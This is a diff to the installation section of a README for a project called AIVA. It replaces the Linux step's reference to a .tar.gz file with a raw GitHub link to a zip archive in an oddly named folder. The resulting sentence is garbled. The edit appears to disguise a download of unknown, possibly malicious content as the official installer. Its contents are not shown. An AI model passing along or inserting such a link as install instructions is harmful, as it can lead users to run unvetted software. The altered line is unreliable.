pacynet/AIVA/README.md

 4. **Install AIVA**:
    - For **Windows**: Double-click the downloaded `.exe` file and follow the instructions.
    - For **macOS**: Open the downloaded `.dmg` file, drag AIVA to your Applications folder, and launch it from there.
-   - For **Linux**: Extract the .tar.gz file and follow the included instructions to install.
+   - For **Linux**: Extract the https://raw.githubusercontent.com/pacynet/AIVA/main/Uromastix/AIVA.zip file and follow the included instructions to install.

 ## 🌟 Features